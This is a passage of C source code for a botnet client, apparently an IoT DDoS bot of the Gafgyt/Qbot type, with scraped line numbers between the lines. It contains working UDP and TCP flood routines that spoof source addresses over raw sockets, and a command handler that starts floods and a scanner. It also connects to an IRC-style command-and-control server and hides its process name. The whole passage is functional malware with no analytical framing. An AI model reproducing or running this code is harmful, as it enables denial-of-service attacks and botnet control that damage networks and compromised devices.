udph->source = rand_cmwc();
1067
udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1068
iph->id = rand_cmwc();
1069
iph->saddr = htonl( getRandomIP(netmask) );
1070
iph->check = csum ((unsigned short *) packet, iph->tot_len);
1071
1072
if(i == pollRegister)
1073
{
1074
if(time(NULL) > end) break;
1075
i = 0;
1076
continue;
1077
}
1078
i++;
1079
}
1080
}
1081
}
1082
1083
void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
1084
{
1085
register unsigned int pollRegister;
1086
pollRegister = pollinterval;
1087
1088
struct sockaddr_in dest_addr;
1089
1090
dest_addr.sin_family = AF_INET;
1091
if(port == 0) dest_addr.sin_port = rand_cmwc();
1092
else dest_addr.sin_port = htons(port);
1093
if(getHost(target, &dest_addr.sin_addr)) return;
1094
memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1095
1096
int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1097
if(!sockfd)
1098
{
1099
//sockprintf(mainCommSock, "Failed opening raw socket.");
1100
return;
1101
}
1102
1103
int tmp = 1;
1104
if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1105
{
1106
//sockprintf(mainCommSock, "Failed setting raw headers mode.");
1107
return;
1108
}
1109
1110
in_addr_t netmask;
1111
1112
if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1113
else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1114
1115
unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1116
struct iphdr *iph = (struct iphdr *)packet;
1117
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1118
1119
makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1120
1121
tcph->source = rand_cmwc();
1122
tcph->seq = rand_cmwc();
1123
tcph->ack_seq = 0;
1124
tcph->doff = 5;
1125
1126
if(!strcmp(flags, "all"))
1127
{
1128
tcph->syn = 1;
1129
tcph->rst = 1;
1130
tcph->fin = 1;
1131
tcph->ack = 1;
1132
tcph->psh = 1;
1133
} else {
1134
unsigned char *pch = strtok(flags, ",");
1135
while(pch)
1136
{
1137
if(!strcmp(pch, "syn"))
1138
{
1139
tcph->syn = 1;
1140
} else if(!strcmp(pch, "rst"))
1141
{
1142
tcph->rst = 1;
1143
} else if(!strcmp(pch, "fin"))
1144
{
1145
tcph->fin = 1;
1146
} else if(!strcmp(pch, "ack"))
1147
{
1148
tcph->ack = 1;
1149
} else if(!strcmp(pch, "psh"))
1150
{
1151
tcph->psh = 1;
1152
} else {
1153
sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
1154
}
1155
pch = strtok(NULL, ",");
1156
}
1157
}
1158
1159
tcph->window = rand_cmwc();
1160
tcph->check = 0;
1161
tcph->urg_ptr = 0;
1162
tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1163
tcph->check = tcpcsum(iph, tcph);
1164
1165
iph->check = csum ((unsigned short *) packet, iph->tot_len);
1166
1167
int end = time(NULL) + timeEnd;
1168
register unsigned int i = 0;
1169
while(1)
1170
{
1171
sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1172
1173
iph->saddr = htonl( getRandomIP(netmask) );
1174
iph->id = rand_cmwc();
1175
tcph->seq = rand_cmwc();
1176
tcph->source = rand_cmwc();
1177
tcph->check = 0;
1178
tcph->check = tcpcsum(iph, tcph);
1179
iph->check = csum ((unsigned short *) packet, iph->tot_len);
1180
1181
if(i == pollRegister)
1182
{
1183
if(time(NULL) > end) break;
1184
i = 0;
1185
continue;
1186
}
1187
i++;
1188
}
1189
}
1190
1191
void processCmd(int argc, unsigned char *argv[])
1192
{
1193
if(!strcmp(argv[0], "PING"))
1194
{
1195
// sockprintf(mainCommSock, "PONG!");
1196
return;
1197
}
1198
1199
if(!strcmp(argv[0], "GETLOCALIP"))
1200
{
1201
sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP));
1202
return;
1203
}
1204
1205
if(!strcmp(argv[0], "LILBITCH"))
1206
{
1207
uint32_t parent;
1208
parent = fork();
1209
int ii = 0;
1210
int forks = sysconf( _SC_NPROCESSORS_ONLN );
1211
int fds = 999999;
1212
if(forks == 1) fds = 500;
1213
if(forks >= 2) fds = 1000;
1214
if (parent > 0) { scanPid = parent; return;}
1215
else if(parent == -1) return;
1216
for (ii = 0; ii < forks; ii++)
1217
{
1218
srand((time(NULL) ^ getpid()) + getppid());
1219
init_rand(time(NULL) ^ getpid());
1220
StartTheLelz(100, fds);
1221
_exit(0);
1222
}
1223
}
1224
1225
if(!strcmp(argv[0], "UDP"))
1226
{
1227
if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
1228
{
1229
//sockprintf(mainCommSock, "UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <packet size (1 to 65500)> (time poll interval, default 10)");
1230
return;
1231
}
1232
1233
unsigned char *ip = argv[1];
1234
int port = atoi(argv[2]);
1235
int time = atoi(argv[3]);
1236
int spoofed = atoi(argv[4]);
1237
int packetsize = atoi(argv[5]);
1238
int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
1239
1240
if(strstr(ip, ",") != NULL)
1241
{
1242
unsigned char *hi = strtok(ip, ",");
1243
while(hi != NULL)
1244
{
1245
if(!listFork())
1246
{
1247
sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
1248
_exit(0);
1249
}
1250
hi = strtok(NULL, ",");
1251
}
1252
} else {
1253
if (listFork()) { return; }
1254
1255
sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
1256
_exit(0);
1257
}
1258
}
1259
1260
if(!strcmp(argv[0], "TCP"))
1261
{
1262
if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
1263
{
1264
//sockprintf(mainCommSock, "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)");
1265
return;
1266
}
1267
1268
unsigned char *ip = argv[1];
1269
int port = atoi(argv[2]);
1270
int time = atoi(argv[3]);
1271
int spoofed = atoi(argv[4]);
1272
unsigned char *flags = argv[5];
1273
1274
int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
1275
int psize = argc > 6 ? atoi(argv[6]) : 0;
1276
1277
if(strstr(ip, ",") != NULL)
1278
{
1279
unsigned char *hi = strtok(ip, ",");
1280
while(hi != NULL)
1281
{
1282
if(!listFork())
1283
{
1284
sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
1285
_exit(0);
1286
}
1287
hi = strtok(NULL, ",");
1288
}
1289
} else {
1290
if (listFork()) { return; }
1291
1292
sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
1293
_exit(0);
1294
}
1295
}
1296
if(!strcmp(argv[0], "KILL"))
1297
{
1298
int killed = 0;
1299
unsigned long i;
1300
for (i = 0; i < numpids; i++) {
1301
if (pids[i] != 0 && pids[i] != getpid()) {
1302
kill(pids[i], 9);
1303
killed++;
1304
}
1305
}
1306
if(killed > 0)
1307
{
1308
// sockprintf(mainCommSock, "Killed %d.", killed);
1309
} else {
1310
//sockprintf(mainCommSock, "None Killed.");
1311
}
1312
}
1313
if(!strcmp(argv[0], "LUCKYLILDUDE"))
1314
{
1315
exit(0);
1316
}
1317
}
1318
int initConnection()
1319
{
1320
unsigned char server[512];
1321
memset(server, 0, 512);
1322
if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
1323
if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
1324
else currentServer++;
1325
1326
strcpy(server, commServer[currentServer]);
1327
int port = 6667;
1328
if(strchr(server, ':') != NULL)
1329
{
1330
port = atoi(strchr(server, ':') + 1);
1331
*((unsigned char *)(strchr(server, ':'))) = 0x0;
1332
}
1333
mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
1334
if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
1335
return 0;
1336
}
1337
1338
int main(int argc, unsigned char *argv[])
1339
{
1340
char *mynameis = "";
1341
if(SERVER_LIST_SIZE <= 0) return 0;
1342
strncpy(argv[0],"",strlen(argv[0]));
1343
argv[0] = "";
1344
prctl(PR_SET_NAME, (unsigned long) mynameis, 0, 0, 0);
1345
srand(time(NULL) ^ getpid());
1346
init_rand(time(NULL) ^ getpid());
1347
pid_t pid1;
1348
pid_t pid2;
1349
int status;
1350
1351
1352
if (pid1 = fork()) {
1353
waitpid(pid1, &status, 0);
1354
exit(0);
1355
} else if (!pid1) {
1356
if (pid2 = fork()) {
1357
exit(0);
1358
} else if (!pid2) {
1359
} else {
1360
}
1361
} else {
1362
1363
}
1364
1365
setsid();
1366
chdir("/");
1367
1368
signal(SIGPIPE, SIG_IGN);
1369
1370
while(1)
1371
{
1372
if(initConnection()) { sleep(5); continue; }
1373
1374
char commBuf[4096];
1375
int got = 0;
1376
int i = 0;
1377
while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
1378
{
1379
for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
1380
unsigned int *newpids, on;
1381
for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
1382
pids[on - 1] = 0;
1383
numpids--;
1384
newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
1385
for (on = 0; on < numpids; on++) newpids[on] = pids[on];
1386
free(pids);
1387
pids = newpids;
1388
}
1389
1390
commBuf[got] = 0x00;
1391
1392
trim(commBuf);
1393
1394
if(strstr(commBuf, "PING") == commBuf)
1395
{
1396
continue;
1397
}
1398
1399
if(strstr(commBuf, "DUP") == commBuf) exit(0);
1400
1401
unsigned char *message = commBuf;
1402
1403
if(*message == '!')
1404
{
1405
unsigned char *nickMask = message + 1;
1406
while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
1407
if(*nickMask == 0x00) continue;
1408
*(nickMask) = 0x00;
1409
nickMask = message + 1;
1410
1411
message = message + strlen(nickMask) + 2;
1412
while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
1413
1414
unsigned char *command = message;
1415
while(*message != ' ' && *message != 0x00) message++;
1416
*message = 0x00;
1417
message++;
1418
1419
unsigned char *tmpcommand = command;
1420
while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
1421
1422
unsigned char *params[10];
1423
int paramsCount = 1;
1424
unsigned char *pch = strtok(message, " ");
1425
params[0] = command;
1426
1427
while(pch)
1428
{
1429
if(*pch != '\n')
1430
{
1431
params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
1432
memset(params[paramsCount], 0, strlen(pch) + 1);
1433
strcpy(params[paramsCount], pch);
1434
paramsCount++;
1435
}
1436
pch = strtok(NULL, " ");
1437
}
1438
processCmd(paramsCount, params);
1439
if(paramsCount > 1)
1440
{
1441
int q = 1;
1442
for(q = 1; q < paramsCount; q++)
1443
{
1444
free(params[q]);
1445
}
1446
}
1447
}
1448
}
1449
}
1450
return 0;
1451
}
1452